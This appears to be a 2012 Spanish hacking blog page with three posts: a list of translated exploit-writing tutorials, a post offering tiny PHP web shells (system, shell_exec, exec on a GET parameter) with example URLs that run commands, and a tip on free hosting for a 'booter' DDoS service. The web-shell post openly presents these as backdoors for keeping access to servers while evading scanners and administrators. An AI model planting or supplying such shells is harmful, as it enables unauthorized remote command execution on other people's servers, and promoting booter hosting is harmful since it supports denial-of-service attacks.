jueves, 27 de septiembre de 2012

Creación de Exploits por corelanc0d3r traducidos por Ivinson


Hace poco nuestro amigo Ivinson de cracklatinos se puso a traducir los tutoriales de "Creación de Exploit" de corelanc0d3r, lo cual le estoy agradecido por su trabajo y el ya lo sabe xD.

Aquí les dejo la lista de tutoriales traducidos al español así que disfrutenlo.

Creación de Exploits 1: Desbordamiento de Stack por corelanc0d3r traducido por Ivinson

Creación de Exploits 2: Desbordamiento de Stack  por corelanc0d3r traducido por Ivinson

Creación de Exploits  3: SEH  por corelanc0d3r traducido por Ivinson

Creación de Exploits 3b: SEH  por corelanc0d3r traducido por Ivinson

Creacion de Exploits 4: De Exploit a Metasploit por corelanc0d3r traducido por Ivinson

Creación de Exploits 5:  Acelerar el Proceso con Plugins y módulos por corelanc0d3r traducido por Ivinson

viernes, 7 de septiembre de 2012

Backdorea con las Shell Web mas pequeñas!


De seguro ya habrán visto algunos funciones PHP que te ejecutan comandos como si estuvieran en una shell y con las cuales podemos hacer un backdoor y mantener el acceso en un servidor.
Además les quiero mostrar algunos códigos ingeniosos para llegar a ello y asi pasar desapercibido ante un scanner o hasta el mismísimo administrador Web.

Para comenzar les voy a listar los mas conocidos y detectados a simple vista:

system.php
<?@system($_GET[_]);?>

ww2.pwnakil.com/PoC/shell/system.php?_=ls -a


shell_exec.php
<?=@shell_exec($_GET[_])?>

ww2.pwnakil.com/PoC/shell/shell_exec.php?_=ls -a


exec.php
<?=@exec($_GET[_])?>

ww2.pwnakil.com/PoC/shell/exec.php?_=ls -a

jueves, 6 de septiembre de 2012

Hosting Free para tu Booter

Paseando por internet, me tope con esta Web la cual ofrece un servicio de hosting gratis con Cpanel, lo unico que tienes que tener es un dominio, puede ser de pago o free como estos uni.me.

Aqui esta la direccion hyperhosts.com.